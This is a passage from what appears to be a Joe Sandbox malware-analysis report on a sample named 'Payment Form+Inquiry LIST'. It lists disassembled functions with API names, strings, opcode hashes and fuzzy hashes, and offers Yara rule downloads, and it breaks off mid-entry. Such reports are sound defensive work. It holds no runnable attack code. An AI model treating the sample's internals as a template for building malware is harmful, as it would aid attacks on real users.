                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                            • String ID:
                            • API String ID: 2131581837-0
                            • Opcode ID: 5ea28ad98453398e5207998a158429e1aa3c9fd4ffe220d449b8d9d8c7c207fb
                            • Instruction ID: 753ca33785ed7d6ce77a0e99ca344daaea7469e95f19c81a9e0488892a17aeb4
                            • Opcode Fuzzy Hash: 5ea28ad98453398e5207998a158429e1aa3c9fd4ffe220d449b8d9d8c7c207fb
                            • Instruction Fuzzy Hash: A3119E73908B8186DA24DF25B4012AEB360FB447B0F144339E6BD8B7DACF39D442874A
                            Function 00007FF6E8262A70 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 6b29141644b4f393e6c212dee8608d45edcd92e76b8a00e80d54dc913ba57c49
                            • Instruction ID: d00d7d46373075c34a3a5d7ea2b2c52ba220e81c0a9aeee5ea1e3f34ec6450f3
                            • Opcode Fuzzy Hash: 6b29141644b4f393e6c212dee8608d45edcd92e76b8a00e80d54dc913ba57c49
                            • Instruction Fuzzy Hash: F5B01204F16041C2EB0427737C4230802253B15B02FC48064DA08F12D4CD1D81A54B09

                            Non-executed Functions

                            Function 00007FF6E8262D00 Relevance: 123.1, Strings: 98, Instructions: 569COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                            • API String ID: 0-1379766591
                            • Opcode ID: bfe385bf2e7e8c94031eee7b4a47a92a4b86f4fa3b6bfc22cbeaf3b91d706fc3
                            • Instruction ID: f2142628b8e1171bf29c6e51de337873def806ddebfa234b2e20049b888c586c
                            • Opcode Fuzzy Hash: bfe385bf2e7e8c94031eee7b4a47a92a4b86f4fa3b6bfc22cbeaf3b91d706fc3
                            • Instruction Fuzzy Hash: 9A426062608A57C2EB609B65F810BA963A1FFA47C8F451132D98C87B24DF3ED205C74E
                            Function 00007FF6E8263AC0 Relevance: 113.0, Strings: 90, Instructions: 479COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                            • API String ID: 1004003707-1492036319
                            • Opcode ID: 1862b040dfa0aa20fa9b930549220c12fbfb3527a35bdf50325036bc5f1cbcbb
                            • Instruction ID: d4bba559c86006c9043ac13ab2f5fcea9efef4c54c3b564a478a2776a9aebc08
                            • Opcode Fuzzy Hash: 1862b040dfa0aa20fa9b930549220c12fbfb3527a35bdf50325036bc5f1cbcbb
                            • Instruction Fuzzy Hash: 6D62B626D0DB47D8FA02DBB5A8402A22BE1EFA5744F844036C45DC7276DE2EA15DC78F
                            Function 00007FF6E8262B30 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                            • String ID: SeLockMemoryPrivilege
                            • API String ID: 1752251271-475654710
                            • Opcode ID: acbb3d299e41888ec6866634865e251bbb6dcee1bb0ab8316e1da59d9c6b1da2
                            • Instruction ID: d72ad5f7f0b753cb439f5c4f58fb01b97b959d30614c3f79b954a2479a69c89e
                            • Opcode Fuzzy Hash: acbb3d299e41888ec6866634865e251bbb6dcee1bb0ab8316e1da59d9c6b1da2
                            • Instruction Fuzzy Hash: B131CF73A1CA428AFB209BB1B5443AA67A2EB94B84F044074DE4E97A54DE3ED405C74D
                            Function 00007FF6E8256AA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245COMMON
                            Download Yara Rule
                            APIs
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256B58
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256CAB
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256D83
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256D99
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256E15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: [ KeepUnwinding ]
                            • API String ID: 2546344036-400895726
                            • Opcode ID: bc1ece02c8a8cc7deb67b16b3ca6687fcff076318ea1244f4e1a57b41394721c
                            • Instruction ID: 59f6d244e60f6b9252cc8eb16fdd1dfed1b3f1ca64929d69124a0473a38c7c87
                            • Opcode Fuzzy Hash: bc1ece02c8a8cc7deb67b16b3ca6687fcff076318ea1244f4e1a57b41394721c
                            • Instruction Fuzzy Hash: 2CB15933A4AB4189EB948F30D5407A933A1FB44B48F580136CE4D8B398DF3AE955C39A
                            Function 00007FF6E82B11B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: 58f0a1f78f3038062b96adf870200572365bf3702c4026d2a62309caccee7141
                            • Instruction ID: edc320b3d3e145627e96e7692f9a4b0faa703212bdfb52cb4793ce9068a19f64
                            • Opcode Fuzzy Hash: 58f0a1f78f3038062b96adf870200572365bf3702c4026d2a62309caccee7141
                            • Instruction Fuzzy Hash: 2E111C26B54B058AEF00CFB0E8552A833A4FB59768F440E31DE6D867A4EF79D1688345
                            Function 00007FF6E8282DB0 Relevance: 4.8, APIs: 3, Instructions: 256threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: adaaeb83c35ca74f50f49f9627e3b41c21a1c9c20bda17f901148958122b3767
                            • Instruction ID: bc519fb55689fce060a3f29d51af2979dcfa272aceda3bd73edefb58358b4009
                            • Opcode Fuzzy Hash: adaaeb83c35ca74f50f49f9627e3b41c21a1c9c20bda17f901148958122b3767
                            • Instruction Fuzzy Hash: 90B16A63A09B428AEA509B78D6443B873A0FB14B94F448535DA1DC73A5DF3EF494C38E
                            Function 00007FF6E826D1F0 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 195COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID: @
                            • API String ID: 3168844106-2766056989
                            • Opcode ID: f0ef4aa89743a7b3ac6a9866301a25a9799488a80a8622f3ab40c6711f891bda
                            • Instruction ID: db71b227abb1e1edd2bc16c72ffe7aecb3f87a7f4d423ac4fc5e91b47d2862eb
                            • Opcode Fuzzy Hash: f0ef4aa89743a7b3ac6a9866301a25a9799488a80a8622f3ab40c6711f891bda
                            • Instruction Fuzzy Hash: AE914C23A1C646CBFB518F35EA40375A2A0EF55B84F580135C94CC76A5DE2FF488978E
                            Function 00007FF6E828E4B0 Relevance: 3.3, APIs: 2, Instructions: 344threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: 1051c25b48e73d9c0e44e351c7ca1797daa53e6601eef59b1f86331242a91ab9
                            • Instruction ID: 0c9430d7819922a7231fc19645ea51a379c07caf36a559d32d535087a23b18fb
                            • Opcode Fuzzy Hash: 1051c25b48e73d9c0e44e351c7ca1797daa53e6601eef59b1f86331242a91ab9
                            • Instruction Fuzzy Hash: A8E1727BA09B918AEB608B25E50036DB360FB44B94F544131DA5D83B98DF7EE441C78E
                            Function 00007FF6E8261C50 Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                            Download Yara Rule
                            APIs
                            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6E8257E5B,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8261CEF
                            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6E8257E5B,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8261D4C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: EnabledFeaturesState
                            • String ID:
                            • API String ID: 1557480591-0
                            • Opcode ID: 806af91b1d32c00ef7ec50295839dbf2ffb405343f8b848cdc30ad716dfe7f6e
                            • Instruction ID: 781c1b94eebafe87495e3b3c3ecabc2d1b7a0727813612e90d084e20464b250b
                            • Opcode Fuzzy Hash: 806af91b1d32c00ef7ec50295839dbf2ffb405343f8b848cdc30ad716dfe7f6e
                            • Instruction Fuzzy Hash: B351D033F282220BFF6C446991A937512875BA9360F854539DA4ED32C2CD2FF802768D
                            Function 00007FF6E827C3A0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 32a7cf4d0a956533d5ea72fe7eed7f9228e68fe6483b65906fae45b442e3f00e
                            • Instruction ID: 5b9874f191c24f5b3c9607ec8c8647846b6e08a9abaf2aaf60f24215b9ed3fb4
                            • Opcode Fuzzy Hash: 32a7cf4d0a956533d5ea72fe7eed7f9228e68fe6483b65906fae45b442e3f00e
                            • Instruction Fuzzy Hash: AF417023B18A9689EB108F36E651379A3A0FB44BC4F181035DE4D97B95DF3EE050834D
                            Function 00007FF6E82846E0 Relevance: 1.8, Strings: 1, Instructions: 564COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 94cf00b91eddb1979c5eb3837ab65cd260dae8569e862585b2f0dce0c0f59cb7
                            • Instruction ID: 28d6207e6c7f6bae1caa5c5fe96ef00c8795baf9281760f4cc183f3f676e9076
                            • Opcode Fuzzy Hash: 94cf00b91eddb1979c5eb3837ab65cd260dae8569e862585b2f0dce0c0f59cb7
                            • Instruction Fuzzy Hash: 22429933E08A96CAEA518B25EA0077977A0FB547A4F454236CA6DC37D0DF3EE454834E
                            Function 00007FF6E826FE70 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?
                            • API String ID: 0-1684325040
                            • Opcode ID: 42c7ba14f30e3ea73d2a5bba1dd5255a1b4ce2924ed444ed1f271061779197f3
                            • Instruction ID: 4d15644037a0f9633d36e1f6f701a0989b776d4bcfacebd6c4bc5e5b27ba4af7
